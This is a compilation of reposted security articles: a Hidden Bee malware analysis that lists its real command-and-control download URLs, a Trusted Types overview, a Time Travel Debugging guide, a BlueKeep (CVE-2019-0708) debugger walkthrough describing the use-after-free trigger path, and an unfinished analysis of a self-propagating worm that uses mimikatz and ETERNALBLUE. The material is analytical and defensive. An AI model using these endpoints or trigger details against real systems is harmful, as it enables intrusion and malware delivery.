Entering the function unpacking the first !rsi package: The function unpacking the !rsi format is structured similarly to the !rbx unpacking. It also starts by checking the keyword: Checking the “!rsi” keyword As mentioned before, both !rsi packages are used to store filesystems marked with the keyword “SPUTNIK”. It is another custom filesystem invented by the Hidden Bee authors that contains additional modules. The “SPUTNIK” keyword is checked after the module is unpacked Unpacking sputnik.spk resulted in the following SPUTNIK module: 455738924b7665e1c15e30cf73c9c377 It is worth noting that the unpacked filesystem contains four executables: two pairs consisting of NS and PE, respectively 32- and 64-bit. In the currently-analyzed setup, the 32-bit versions are deployed. The NS module will be the next to run. First, it is loaded by the current executable, and then the execution is redirected there. Interestingly, both !rsi modules are passed as arguments to the entry point of the new module. (They will be used later to retrieve more components.) Calling the newly-loaded NS executable Sixth stage: mpsi.dll (unpacked from SPUTNIK) Entering the NS module starts another layer of the malware: Entry Point of the NS module: the !rsi modules, prepended with their size, are passed The analyzed module, converted to PE, is available here: 537523ee256824e371d0bc16298b3849 This module is responsible for loading plugins. It will also create a named pipe through which it will communicate with other modules. It sets up the commands that are going to be executed on demand. This is how the beginning of the main function looks: As in previous cases, it starts by finishing loading itself (relocations and imports). Then, it patches the function in NTDLL. This is a common prolog in many Hidden Bee modules. Then, we have another phase of loading elements from the supplied packages. The path that will be taken depends on the runtime arguments. 
If the function received both !rsi packages, it will start by parsing one of them, retrieving and loading submodules. First, the SPUTNIK filesystem must be unpacked from the !rsi package: After being unpacked, it is mounted. The filesystems are mounted internally in memory: A global structure is filled with pointers to the appropriate elements of the filesystem. At the beginning, we can see the list of the plugins that are going to be loaded: cloudcompute.api, deepfreeze.api, and netscan.api. Those names are appended to the root path of the modules. Each module is fetched from the mounted filesystem and loaded: Calling the function to load the plugin Consecutive modules are loaded one after another into the same executable memory area. After a module is loaded, its header is erased. This is a common technique used to make dumping the payload from memory more difficult. The cloudcompute.api is a plugin that will load the miner. More about the plugins will be explained in the next section of this post. Reading its code, we find out that the SPUTNIK modules are filesystems that can be mounted and dismounted on demand. This module communicates with the others through a named pipe, receiving commands and executing the appropriate handlers. Initialization of the commands’ parser: The function setting up the commands: For each name, a handler is registered. (This is probably the Lua dispatcher, first described here.) When the plugins are run, we can see some additional child processes created by the process running the coredll (in the analyzed case, inside rundll32): It also triggers a firewall alert, which means the malware requested to open some ports (triggered by the netscan.api plugin): We can see that it started listening on one TCP and one UDP port: The plugins As mentioned in the previous section, the SPUTNIK filesystem contains three plugins: cloudcompute.api, deepfreeze.api, and netscan.api. 
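The command parser described above — a table in which each command name maps to a registered handler, driven by messages arriving over the pipe — can be approximated in Python. The command names and handlers below are invented purely for illustration; the post does not disclose the real command set:

```python
class CommandDispatcher:
    """Minimal name-to-handler dispatcher, mirroring the pattern where
    'for each name, a handler is registered'."""

    def __init__(self):
        self.handlers = {}

    def register(self, name, handler):
        # register a handler under a command name
        self.handlers[name] = handler

    def dispatch(self, name, *args):
        handler = self.handlers.get(name)
        if handler is None:
            return None  # unknown command: ignore it
        return handler(*args)

disp = CommandDispatcher()
# hypothetical commands, loosely inspired by the mount/dismount behavior
disp.register("mount", lambda path: f"mounted {path}")
disp.register("umount", lambda path: f"unmounted {path}")
print(disp.dispatch("mount", "/pkg/plugins.spk"))
```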
If we convert them to PE, we can see that all of them import an unknown DLL: mpsi.dll. When we look at the filled import table, we find out that the addresses have been filled in, redirecting to the functions from the previous NS module: So we can conclude that the previous element is the mpsi.dll. Although its export table has been destroyed, the functions are fetched by the custom loader and filled into the import tables of the loaded plugins. First, cloudcompute.api is run. This plugin retrieves from the filesystem a file named “/etc/ccmain.json” that contains a list of URLs: Those are the addresses from which another set of modules is going to be downloaded: ["sstp://news.onetouchauthentication.online:443/mlf_plug.zip.sig","sstp://news.onetouchauthentication.club:443/mlf_plug.zip.sig","sstp://news.onetouchauthentication.icu:443/mlf_plug.zip.sig","sstp://news.onetouchauthentication.xyz:443/mlf_plug.zip.sig"] It also retrieves another component from the SPUTNIK filesystem: /bin/i386/ccmain.bin. This time, it is an executable in the NE format (a version converted to PE is available here: 367db629beedf528adaa021bdb7c12de) This is the component that is injected into msdtc.exe. The HiddenBee module mapped into msdtc.exe The configuration is also copied into the remote process and is used to retrieve an additional package from the C&C: This is the plugin responsible for downloading and deploying the Mellifera Miner: the core component of Hidden Bee. Next, netscan.api loads the module /bin/i386/kernelbase.bin (converted to PE: d7516ad354a3be2299759cd21e161a04) The miner in APT-style Hidden Bee is an eclectic piece of malware. Although it is a commodity malware used for cryptocurrency mining, its design reminds us of espionage platforms used by APTs. Going through all its components is exhausting, but also fascinating. The authors are highly professional, not only as individuals but also as a team, because the design is consistent in all its complexity. 
Appendix https://github.com/hasherezade/hidden_bee_tools – helper tools for parsing and converting Hidden Bee custom formats https://www.bleepingcomputer.com/news/security/new-underminer-exploit-kit-discovered-pushing-bootkits-and-coinminers/ Articles about the previous version (in Chinese): https://www.freebuf.com/column/174581.html https://www.freebuf.com/column/175106.html Our first encounter with the Hidden Bee: https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/ Sursa: https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/
-
18 years have passed since Cross-Site Scripting (XSS) was first identified as a web vulnerability class. Since then, numerous efforts have been proposed to detect, fix or mitigate it. We've seen vulnerability scanners, fuzzers, static & dynamic code analyzers, taint tracking engines, linters, and finally XSS filters, WAFs and all the various flavours of Content Security Policy. Various libraries have been created to minimize or eliminate the risk of XSS: HTML sanitizers, templating libraries, sandboxing solutions - and yet XSS is still one of the most prevalent vulnerabilities plaguing web applications. It seems like, while we have a pretty good grasp on how to address stored & reflected XSS, "solving" DOM XSS remains an open question. DOM XSS is caused by the ever-growing complexity of client-side JavaScript code (see script gadgets), but most importantly - by the lack of security in the DOM API design. But perhaps we have a chance this time? Trusted Types is a new browser API that allows a web application to limit its interaction with the DOM, with the goal of obliterating DOM XSS. Based on the battle-tested design that prevents XSS in most of the Google web applications, Trusted Types adds the DOM XSS prevention API to the browsers. Trusted Types allow isolating the application components that may potentially introduce DOM XSS into tiny, reviewable pieces, and guarantee that the rest of the code is DOM-XSS free. They can also leverage existing solutions like autoescaping templating libraries, or client-side sanitizers, using them as building blocks of a secure application. Trusted Types have a working polyfill, an implementation in Chrome, and integrate well with existing JS frameworks and libraries. Oddly similar to both XSS filters and CSP, they are also fundamentally different, and in our opinion have a reasonable chance of eliminating DOM XSS - once and for all.
-
Time travel debugging: It’s a blast! (from the past) swiat, May 29, 2019 The Microsoft Security Response Center (MSRC) works to assess vulnerabilities that are externally reported to us as quickly as possible, but time can be lost if we have to confirm details of the repro steps or environment with the researcher to reproduce the vulnerability. Microsoft has made our “Time Travel Debugging” (TTD) tool publicly available to make it easy for security researchers to provide full repro, shortening investigations and potentially contributing to higher bounties (see “Report quality definitions for Microsoft’s Bug Bounty programs”). We use it internally, too—it has allowed us to find the root cause for complex software issues in half the time it would take with a regular debugger. If you’re wondering where you can get the TTD tool and how to use it, this blog post is for you. Understanding time travel debugging Whether you call it “timeless debugging”, “record-replay debugging”, “reverse debugging”, or “time travel debugging”, it’s the same idea: the ability to record the execution of a program. Once you have this recording, you can navigate forward or backward, and you can share it with colleagues. Even better, an execution trace is a deterministic recording; everybody looking at it sees the same behavior at the same time. When a developer receives a TTD trace, they do not even need to reproduce the issue to travel through the execution trace; they can just navigate the trace file. There are usually three key components associated with time travel debugging:

A recorder, which you can picture as a video camera,
A trace file, which you can picture as the recording file generated by the camera,
A replayer, which you can picture as a movie player.

Good ol’ debuggers Debuggers aren’t new, and the process of debugging an issue has not drastically changed for decades. The process typically works like this: Observing the behavior under a debugger. 
In this step, you recreate an environment like that of the finder of the bug. It can be as easy as running a simple proof-of-concept program on your machine and observing a bug-check, or it can be as complex as setting up an entire infrastructure with specific software configurations just to be able to exercise the code at fault. And that’s if the bug report is accurate and detailed enough to properly set up the environment. Understanding why the issue happened. This is where the debugger comes in. What you expect of a debugger, regardless of architectures and platforms, is to be able to precisely control the execution of your target (stepping over, stepping in at various granularity levels: instruction, source-code line), set breakpoints, and edit the memory as well as the processor context. This basic set of features enables you to get the job done. The cost is usually high, though: a lot of reproducing the issue over and over, a lot of stepping in, and a lot of “Oops... I should not have stepped over, let’s restart”. Wasteful and inefficient. Whether you’re the researcher reporting a vulnerability or a member of the team confirming it, Time Travel Debugging can help the investigation go quickly and with minimal back and forth to confirm details. High-level overview The technology that Microsoft has developed is called “TTD”, for time-travel debugging. Born out of Microsoft Research around 2006 (cf. “Framework for Instruction-level Tracing and Analysis of Program Executions”), it was later improved and productized by Microsoft’s debugging team. The project relies on code emulation to record every event that replay will need to reproduce the exact same execution: the exact same sequence of instructions with the exact same inputs and outputs. The data that the emulator tracks includes memory reads, register values, thread creation, module loads, etc. 
Recording / Replaying The recording software CPU, TTDRecordCPU.dll, is injected into the target process and hijacks the control flow of the threads. The emulator decodes native instructions into an internal custom intermediate language (modeled after simple RISC instructions), caches blocks, and executes them. From then on, it carries the execution of those threads forward and dispatches callbacks whenever an event happens, such as when an instruction has been translated, etc. Those callbacks allow the trace file writer component to collect the information needed for the software CPU to replay the execution based off the trace file. The replay software CPU, TTDReplayCPU.dll, shares most of the same codebase as the record CPU, except that instead of reading the target memory it loads data directly from the trace file. This allows you to replay with full fidelity the execution of a program without needing to run the program. The trace file The trace file is a regular file on your file system that ends with the ‘run’ extension. The file uses a custom file format and compression to optimize the file size. You can also view this file as a database filled with rich information. To give the debugger fast access to the information it requires, “WinDbg Preview” creates an index file the first time you open a trace file. It usually takes a few minutes to create. Usually, this index is about one to two times as large as the original trace file. As an example, tracing the program ping.exe on my machine generates a trace file of 37MB and an index file of 41MB. There are about 1,973,647 instructions (about 132 bits per instruction). Note that, in this instance, the trace file is so small that the internal structures of the trace file account for most of the space overhead. A larger execution trace usually contains about 1 to 2 bits per instruction. Recording a trace with WinDbg Preview Now that you’re familiar with the pieces of TTD, here’s how to use them. 
Get TTD: TTD is currently available on Windows 10 through the “WinDbg Preview” app that you can find in the Microsoft store: https://www.microsoft.com/en-us/p/windbg-preview/9pgjgd53tn86?activetab=pivot:overviewtab. Once you install the application, the “Time Travel Debugging - Record a trace” tutorial will walk you through recording your first execution trace. Building automations with TTD A recent improvement to the Windows debugger is the addition of the debugger data model and the ability to interact with it via JavaScript (as well as C++). The details of the data model are out of scope for this blog, but you can think of it as a way to both consume and expose structured data to the user and debugger extensions. TTD extends the data model by introducing very powerful and unique features available under both the @$cursession.TTD and @$curprocess.TTD nodes. TTD.Calls is a function that allows you to answer questions like “Give me every position where foo!bar has been invoked” or “Is there a call to foo!bar that returned 10 in the trace?”. Better yet, like every collection in the data model, you can query them with LINQ operators. Here is what a TTD.Calls object looks like:

0:000> dx @$cursession.TTD.Calls("msvcrt!write").First()
@$cursession.TTD.Calls("msvcrt!write").First()
    EventType       : Call
    ThreadId        : 0x194
    UniqueThreadId  : 0x2
    TimeStart       : 1310:A81 [Time Travel]
    TimeEnd         : 1345:14 [Time Travel]
    Function        : msvcrt!_write
    FunctionAddress : 0x7ffec9bbfb50
    ReturnAddress   : 0x7ffec9be74a2
    ReturnValue     : 401
    Parameters

The API completely hides away ISA-specific details, so you can build queries that are architecture independent. TTD.Calls: Reconstructing stdout To demo how powerful and easy it is to leverage these features, we record the execution of “ping.exe 127.0.0.1” and from the recording rebuild the console output. 
Building this in JavaScript is very easy:

Iterate over every call to msvcrt!write, ordered by time position,
Read the number of bytes given by the third argument from the address pointed to by the second argument,
Display the accumulated results.

'use strict';

function initializeScript() {
    return [new host.apiVersionSupport(1, 3)];
}

function invokeScript() {
    const logln = p => host.diagnostics.debugLog(p + '\n');
    const CurrentSession = host.currentSession;
    const Memory = host.memory;
    const Bytes = [];
    for (const Call of CurrentSession.TTD.Calls('msvcrt!write').OrderBy(p => p.TimeStart)) {
        Call.TimeStart.SeekTo();
        const [_, Address, Count] = Call.Parameters;
        Bytes.push(...Memory.readMemoryValues(Address, Count, 1));
    }
    logln(Bytes.filter(p => p != 0).map(
        p => String.fromCharCode(p)
    ).join(''));
}

TTD.Memory: Finding every thread that touched the LastErrorValue TTD.Memory is a powerful API that allows you to query the trace file for certain types (read, write, execute) of memory access over a range of memory. Every resulting object of a memory query looks like the sample below:

0:000> dx @$cursession.TTD.Memory(0x000007fffffde068, 0x000007fffffde070, "w").First()
@$cursession.TTD.Memory(0x000007fffffde068, 0x000007fffffde070, "w").First()
    EventType      : MemoryAccess
    ThreadId       : 0xb10
    UniqueThreadId : 0x2
    TimeStart      : 215:27 [Time Travel]
    TimeEnd        : 215:27 [Time Travel]
    AccessType     : Write
    IP             : 0x76e6c8be
    Address        : 0x7fffffde068
    Size           : 0x4
    Value          : 0x0

This result identifies the type of memory access done, the time stamps for start and finish, the thread accessing the memory, the memory address accessed, where it has been accessed from, and what value has been read/written/executed. 
To demonstrate its power, let’s create another script that collects the call stack every time the application writes to the LastErrorValue in the current thread’s environment block:

Iterate over every memory write access to &@$teb->LastErrorValue,
Travel to the destination and dump the current call stack,
Display the results.

'use strict';

function initializeScript() {
    return [new host.apiVersionSupport(1, 3)];
}

function invokeScript() {
    const logln = p => host.diagnostics.debugLog(p + '\n');
    const CurrentThread = host.currentThread;
    const CurrentSession = host.currentSession;
    const Teb = CurrentThread.Environment.EnvironmentBlock;
    const LastErrorValueOffset = Teb.targetType.fields.LastErrorValue.offset;
    const LastErrorValueAddress = Teb.address.add(LastErrorValueOffset);
    const Callstacks = new Set();
    for (const Access of CurrentSession.TTD.Memory(
        LastErrorValueAddress,
        LastErrorValueAddress.add(8),
        'w'
    )) {
        Access.TimeStart.SeekTo();
        const Callstack = Array.from(CurrentThread.Stack.Frames);
        Callstacks.add(Callstack);
    }
    for (const Callstack of Callstacks) {
        for (const [Idx, Frame] of Callstack.entries()) {
            logln(Idx + ': ' + Frame);
        }
        logln('----');
    }
}

Note that there are more TTD-specific objects you can use to get information related to events that happened in a trace, the lifetime of threads, and so on. All of those are documented on the “Introduction to Time Travel Debugging objects” page. 
0:000> dx @$curprocess.TTD.Lifetime
@$curprocess.TTD.Lifetime : [F:0, 1F4B:0]
    MinPosition : F:0 [Time Travel]
    MaxPosition : 1F4B:0 [Time Travel]

0:000> dx @$curprocess.Threads.Select(p => p.TTD.Position)
@$curprocess.Threads.Select(p => p.TTD.Position)
    [0x194]  : 1E21:104 [Time Travel]
    [0x7e88] : 717:1 [Time Travel]
    [0x5fa4] : 723:1 [Time Travel]
    [0x176c] : B58:1 [Time Travel]
    [0x76a0] : 1938:1 [Time Travel]

Wrapping up Time Travel Debugging is a powerful tool for security software engineers and can also be beneficial for malware analysis, vulnerability hunting, and performance analysis. We hope you found this introduction to TTD useful and encourage you to use it to create execution traces for the security issues that you are finding. The trace files generated by TTD compress very well; we recommend using 7zip (which usually shrinks the file to about 10% of its original size) before uploading it to your favorite file storage service. Axel Souchet Microsoft Security Response Center (MSRC) FAQ Can I edit memory during replay time? No. As the recorder only saves what is needed to replay a particular execution path in your program, it doesn’t save enough information to be able to re-simulate a different execution. Why don’t I see the bytes when a file is read? The recorder knows only what it has emulated. This means that if another entity (the NT kernel here, but it could also be another process writing into a shared memory section) writes data to memory, there is no way for the emulator to know about it. As a result, if the target program never reads those values back, they will never appear in the trace file. If they are read later, then their values will be available at that point, when the emulator fetches the memory again. This is an area the team is planning on improving soon, so watch this space. Do I need private symbols or source code? You don’t need source code or private symbols to use TTD. 
The recorder consumes native code and doesn’t need anything extra to do its job. If private symbols and source codes are available, the debugger will consume them and provide the same experience as when debugging with source / symbols. Can I record kernel-mode execution? TTD is for user-mode execution only. Does the recorder support self-modifying code? Yes, it does! Are there any known incompatibilities? There are some and you can read about them in “Things to look out for”. Do I need WinDbg Preview to record traces? Yes. As of today, the TTD recorder is shipping only as part of “WinDbg Preview” which is only downloadable from the Microsoft Store. References Time travel debugging Time Travel Debugging - Overview - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/time-travel-debugging-overview Time Travel Debugging: Root Causing Bugs in Commercial Scale Software -https://www.youtube.com/watch?v=l1YJTg_A914 Defrag Tools #185 - Time Travel Debugging – Introduction - https://channel9.msdn.com/Shows/Defrag-Tools/Defrag-Tools-185-Time-Travel-Debugging-Introduction Defrag Tools #186 - Time Travel Debugging – Advanced - https://channel9.msdn.com/Shows/Defrag-Tools/Defrag-Tools-186-Time-Travel-Debugging-Advanced Time Travel Debugging and Queries – https://github.com/Microsoft/WinDbg-Samples/blob/master/TTDQueries/tutorial-instructions.md Framework for Instruction-level Tracing and Analysis of Program Executions - https://www.usenix.org/legacy/events/vee06/full_papers/p154-bhansali.pdf VulnScan – Automated Triage and Root Cause Analysis of Memory Corruption Issues - https://blogs.technet.microsoft.com/srd/2017/10/03/vulnscan-automated-triage-and-root-cause-analysis-of-memory-corruption-issues/ What’s new in WinDbg Preview - https://mybuild.techcommunity.microsoft.com/sessions/77266 Javascript / WinDbg / Data model WinDbg Javascript examples - https://github.com/Microsoft/WinDbg-Samples Introduction to Time Travel Debugging objects - 
https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/time-travel-debugging-object-model WinDbg Preview - Data Model - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/windbg-data-model-preview Sursa: https://blogs.technet.microsoft.com/srd/2019/05/29/time-travel-debugging-its-a-blast-from-the-past/
-
A Debugging Primer with CVE-2019–0708 Bruce Lee May 29 By: @straight_blast ; straightblast426@gmail.com The purpose of this post is to share how one would use a debugger to identify the relevant code path that can trigger the crash. I hope this post will be educational to people who are excited to learn how to use a debugger for vulnerability analysis. This post will not visit details on RDP communication basics and MS_T120. Interested readers should refer to the following blogs that sum up the need-to-know basics: “CVE-2019-0708: A Comprehensive Analysis of a Remote Desktop Services Vulnerability” (www.zerodayinitiative.com) and “RDP Stands for ‘Really DO Patch!’ - Understanding the Wormable RDP Vulnerability CVE-2019-0708” (securingtomorrow.mcafee.com). Furthermore, no PoC code will be provided in this post, as the purpose is to show vulnerability analysis with a debugger. The target machine (debuggee) will be a Windows 7 x64 and the debugger machine will be a Windows 10 x64. Both the debugger and debuggee will run within VirtualBox. Setting up the kernel debugging environment with VirtualBox On the target machine, run cmd.exe with administrative privilege. Use the bcdedit command to enable kernel debugging:

bcdedit /set {current} debug yes
bcdedit /set {current} debugtype serial
bcdedit /set {current} debugport 1
bcdedit /set {current} baudrate 115200
bcdedit /set {current} description "Windows 7 with kernel debug via COM"

When you type bcdedit again, something similar to the following screenshot should display: 2. Shutdown the target machine (debuggee) and right click on the target image in the VirtualBox Manager. Select “Settings” and then “Serial Ports”. Copy the settings as illustrated in the following image and click “OK”: 3. 
Right click on the image that will host the debugger, go to the “Serial Ports” setting, copy the settings as shown, and click “OK”: 4. Keep the debuggee VM shut down, and boot up the debugger VM. On the debugger VM, download and install WinDBG. I will be using the WinDBG Preview edition (see “Download Debugging Tools for Windows - WinDbg” at docs.microsoft.com). 5. Once the debugger is installed, select “Attach to kernel”, set the “Baud Rate” to “115200” and “Port” to “com1”. Click on the “initial break” as well. Click “OK” and the debugger is now ready to attach to the debuggee. 6. Fire up the target “debuggee” machine, and the following prompt will be displayed. Select the one with “debugger enabled” and proceed. On the debugger end, WinDBG will have established a connection with the debuggee. It will require entering “g” into the debugger command prompt a few times to get the debuggee completely loaded up. Also, because the debugging action is handled through “com”, the initial start up will take a bit of time. 7. Once the debuggee is loaded, fire up “cmd.exe” and type “netstat -ano”. Locate the PID that runs port 3389, as follows: 8. Go back to the debugger and click on “Home” -> “Break” to enable the debugger command prompt and type: !process 0 0 svchost.exe This will list a bunch of processes associated with svchost.exe. We’re interested in the process that has PID 1216 (0x4C0). 9. We will now switch into the context of the svchost.exe that runs RDP. In the debugger command prompt, type: .process /i /p fffffa80082b72a0 After the context switch, pause the debugger and run the command “.reload” to reload all the symbols that the process will use. Identifying the relevant code path Without repeating too much of the public information, the patched vulnerability has code changes in IcaBindVirtualChannels. 
We know that if IcaFindChannelByName finds the string “MS_T120”, it calls IcaBindChannel such as: _IcaBindChannel(ChannelControlStructure*, 5, index, dontcare) The following screenshots depict the relevant unpatched code in IcaBindVirtualChannels: We’re going to set two breakpoints. One will be on _IcaBindChannel, where the channel control structure is stored into the channel pointer table. The index at which the channel control structure is stored is based on the index at which the virtual channel name is declared within the clientNetworkData of the MCS Initial Connect and GCC Create packet. The other one will be on the “call _IcaBindChannel” within IcaBindVirtualChannels. The purpose of these breakpoints is to observe the creation of virtual channels and the order in which these channels are created.

bp termdd!IcaBindChannel+0x55 ".printf \"rsi=%d and rbp=%d\\n\", rsi, rbp;dd rdi;.echo"
bp termdd!IcaBindVirtualChannels+0x19e ".printf \"We got a MS_T120, r8=%d\\n\",r8;dd rcx;r $t0=rcx;.echo"

The breakpoint first hits the following, with an index value of “31”: Listing the call stack with “kb” shows the following: We can see that IcaBindChannel is called from IcaCreateChannel, which can be traced all the way to rdpwsx!MSCreateDomain. If we take a look at that function under a disassembler, we notice it is creating the MS_T120 channel: Also, by looking at the patched termdd.sys, we know that the patched code enforces the index for the MS_T120 virtual channel to be 31, so this first breakpoint indicates that the first channel created is the MS_T120 channel. The next breakpoint hit is the 2nd breakpoint (within IcaBindVirtualChannels), followed by the 1st breakpoint (within IcaBindChannel) again: This gets hit as it observed the MS_T120 value from the clientNetworkData. If we compare the address and content displayed in the above image with the one from way, way above, we can see they’re identical. This means both refer to the same channel control structure. 
However, the reference to this structure is being stored at two different locations:

rsi = 31, rbp = 5; [rax + (31 + 5) * 8 + 0xe0] = MS_T120_structure
rsi = 1, rbp = 5; [rax + (1 + 5) * 8 + 0xe0] = MS_T120_structure

In other words, there are two entries in the channel pointer table that hold references to the MS_T120 structure. Afterwards, a few more channels are created which we don't care about:

index 7 with offset 5
index 0 with offset 0 and 1
index 0 with offset 3 and 4

The next step in finding other relevant code to look at is to set a break-on-access (read/write) breakpoint on the MS_T120 structure; the structure is certain to be 'touched' later on. I set the break-on-access breakpoint on the data within the red box, as shown in the following:

As we proceed with the execution, we get calls to IcaDereferenceChannel, which we're not interested in. Then we hit termdd!IcaFindChannel, with some more information to look into from the call stack:

termdd!IcaChannelInput and termdd!IcaChannelInputInternal sound like something that might process data sent to the virtual channel. A pro tip is to set a breakpoint right before a function call, to see whether the registers or the stack (depending on how data is passed to the function) contain recognizable or readable data. I will set a breakpoint on the call to IcaChannelInputInternal, within the IcaChannelInput function:

bp termdd!IcaChannelInput+0xd8

We're interested in calls to the IcaChannelInput breakpoint after IcaBindVirtualChannels has been called. In the above image, right before the call to IcaChannelInputInternal, the rax register holds an address that references the "A"s I passed as data through the virtual channel. I will now set another set of break-on-access breakpoints on the "A"s to see what code will 'touch' them.
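The two aliased table entries can be checked with a little arithmetic. This is a sketch that mirrors the indexing expression seen in IcaBindChannel ([rax + (index + offset) * 8 + 0xE0]); the helper name is mine:

```python
def channel_slot(index, offset=5, base=0xE0, ptr_size=8):
    """Byte offset of a channel pointer table entry, mirroring the
    indexing observed in IcaBindChannel: (index + offset) * 8 + 0xE0."""
    return (index + offset) * ptr_size + base

# MS_T120 bound at its hard-coded index (31) and again at the
# attacker-chosen index (1): two table entries, one structure.
print(hex(channel_slot(31)))  # 0x200
print(hex(channel_slot(1)))   # 0x110
```

The same structure pointer therefore sits at offsets 0x200 and 0x110 from the table base, which is exactly the aliasing the two breakpoint hits revealed.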
ba r8 rax+0xa

The reason I had to add 0xA to the rax register is that a break-on-access breakpoint requires an aligned address (one ending in 0x0 or 0x8 in an x64 environment).

The "A"s are now being worked on in a "memmove" function. Looking at the call stack, the "memmove" is called from "IcaCopyDataToUserBuffer". Let's step out (gu) of the "memmove" to see the destination address the "A"s are being moved to, shown here in the disassembler:

The values for "Src", "Dst" and "Size" (0x20) are as follows:

So the "memmove" copies the "A"s from a kernel address space into a user address space. We will now set another group of break-on-access breakpoints on the user's address space to see how these values are 'touched':

ba r8 00000000`030ec590
ba r8 00000000`030ec598
ba r8 00000000`030ec5a0
ba r8 00000000`030ec5a8

(Side note: if you get the message "Too many data breakpoints for processor 0…", remove some of the older breakpoints you set, then enter "g" again.)

We then get a hit in rdpwsx!IoThreadFunc:

The breakpoint touched the memory section in the highlighted red box:

rdpwsx!IoThreadFunc appears to be the code that parses and handles the MS_T120 data content. Using a disassembler provides a better view:

We will now use the "p" command to step over each instruction. It looks like because I supplied 'AAAA', execution took a different path. According to the blog post from ZDI, we need to send crafted data to the MS_T120 channel (over our selected index) so that it terminates the channel (freeing the MS_T120 channel control structure). Then, when RDPWD!SignalBrokenConnection tries to reach the MS_T120 channel again over index 31 of the channel pointer table, it will use a freed MS_T120 channel control structure, leading to the crash. Based on rdpwsx!IoThreadFunc, it makes sense to craft data that will hit the IcaChannelClose function.
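The alignment requirement mentioned above (break-on-access addresses must end in 0x0 or 0x8 on x64) amounts to rounding to an 8-byte boundary. A small sketch, using an address made up for illustration:

```python
def align_down(addr, size=8):
    """Round addr down to the nearest `size`-byte boundary, as an x64
    hardware (break-on-access) breakpoint address must be aligned."""
    return addr & ~(size - 1)

# A buffer starting at an unaligned address: the nearest usable
# breakpoint address is the preceding 8-byte boundary.
print(hex(align_down(0x030EC59A)))  # 0x30ec598
```

Rounding down means the breakpoint may fire one access earlier than the exact byte of interest, which is harmless for this kind of tracing.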
When the crafted data is correct, it hits rdpwsx!IcaChannelClose.

Before stepping through IcaChannelClose, let's set a breakpoint on the MS_T120 channel control structure to see how it gets affected.

fffffa80`074fcac0 is the current address of the MS_T120 structure. A read breakpoint is hit on fffffa80`074fcac0.

The following picture shows the call stack when the read breakpoint is hit. A call is made to ExFreePoolWithTag, which frees the MS_T120 channel control structure. We can proceed with "g" until we hit the breakpoint in termdd!IcaChannelInput:

Taking a look at the address that held the MS_T120 channel control structure, the content now looks quite different. Furthermore, the call stack shows the call to IcaChannelInput comes from RDPWD!SignalBrokenConnection. The ZDI blog noted this function gets called when the connection terminates. We will use the "t" command to step into the IcaChannelInputInternal function. Once we're inside the function, we will set a new breakpoint:

bp termdd!IcaFindChannel

Once we're inside the IcaFindChannel function, use "gu" to step out of it and return to the IcaChannelInputInternal function:

(The MS_T120 object address differs from the other MS_T120 addresses shown above, as these images were taken across different debugging sessions.)

The rax register holds the reference to the freed MS_T120 channel control structure. As we continue to step through the code, the address at MS_T120+0x18 is used as a parameter (rcx) to the ExEnterCriticalRegionAndAcquireResourceExclusive function. Let's take a look at rcx:

And there we go: if we dereference rcx, there is nothing there! So let's step over ExEnterCriticalRegionAndAcquireResourceExclusive and see the result:

Bruce Lee

Sursa: https://medium.com/@straightblast426/a-debugging-primer-with-cve-2019-0708-ccfa266682f6
-
Dynamic Analysis of a Windows Malicious Self-Propagating Binary

May 29, 2019 by Adrian Hada

Dynamic analysis (execution of malware in a controlled, supervised environment) is one of the most powerful tools in the arsenal of a malware analyst. However, it does come with its challenges. Attackers are aware that they might be watched, so we must take steps to ensure that the analysis machine (aka: sandbox) is invisible to the binary under analysis. Also, since we are granting a piece of malware CPU time, it can use it to further the threat actor's intent. In this blog post, I will walk you through the analysis of one such binary. The malware at hand infects a computer, steals some local information and then proceeds to identify vulnerable targets on the local network and in the greater internet. Once a target has been found, it attempts to deliver malware on that machine. Such self-propagating malware has been in the news a lot in the past couple of years because of WannaCry, Mirai and other threats exhibiting this behavior. However, this technique is not limited to these families of malware – self-propagation has been around since the Morris worm of the late '80s – and we expect it to be used more and more. This raises a dilemma for those analyzing malware – by not limiting the things malware does, we're granting them useful CPU cycles. By limiting them, we are unable to completely analyze the malware to determine all of its capabilities.

AN INTERESTING TARGET

The sample at hand is a Windows binary with SHA256 54a1d78c1734fa791c4ca2f8c62a4f0677cb764ed8b21e198e0934888a735ef8 that we detected in May.

Figure 1 - Basic information for binary

The first things that stand out are its large size – 2.6MB – and the fact that it was compressed using PECompact2. PECompact is an application that is able to reduce the size of a given binary and, with the correct plugins, can also offer reverse-engineering protection.
This is probably an attempt on the attacker's part to make the binary smaller (faster and less conspicuous delivery) and harder for antivirus products to detect. A quick search on VirusTotal shows that this is not the case – 49 out of the 71 detection engines detect it as malicious. Some of the detection names point to The Shadow Brokers, Equation Group and WannaCry. Community information also points to mimikatz, a tool used to steal interesting security tokens from Windows memory after an attacker has established a foothold.

Figure 2 - Detections pointing to known threats and leaks

LOCAL EXECUTION

When executed, the malicious binary drops multiple files on the Windows system. One of these is a version of mimikatz, as mentioned above, dropped under the name "C:\Users\All Users\mmkt.exe". This file is executed and drops a series of files to the local file system containing interesting system tokens:

C:\ProgramData\uname
C:\Users\All users\uname
C:\ProgramData\upass
C:\Users\All users\upass

Other dropped files include some necessary DLL files as well as six other interesting files: two executables, two XML files and two files with the extension ".fb", all to the folder C:\ProgramData:

Blue.exe
Blue.xml
Blue.fb
Star.exe
Star.xml
Star.fb

The 6 files belong to the exploitation toolkit known as FuzzBunch, part of the ShadowBrokers dump, and are required to execute the exploit known as ETERNALBLUE and the DOUBLEPULSAR backdoor that could be deployed using the exploit. The pair has been used in attacks extensively since the dump and WannaCry came out – see the ATI team blogpost on WannaCry as well as another blogpost on other threats exploiting this in the wild after the leak came out. Although the exploits in the ShadowBrokers dump have been around for quite some time, our 2019 Security Report clearly points out that exploitation attempts against vulnerable targets are alive and kicking.
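Given the SHA256 IOC above, dropped files can be triaged quickly by hash. A minimal stdlib sketch (the helper names are mine, not from the Ixia tooling):

```python
import hashlib

# SHA256 of the sample analyzed in this post.
IOC_SHA256 = "54a1d78c1734fa791c4ca2f8c62a4f0677cb764ed8b21e198e0934888a735ef8"

def sha256_of(path):
    """Hash a file in chunks so large samples are not loaded into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

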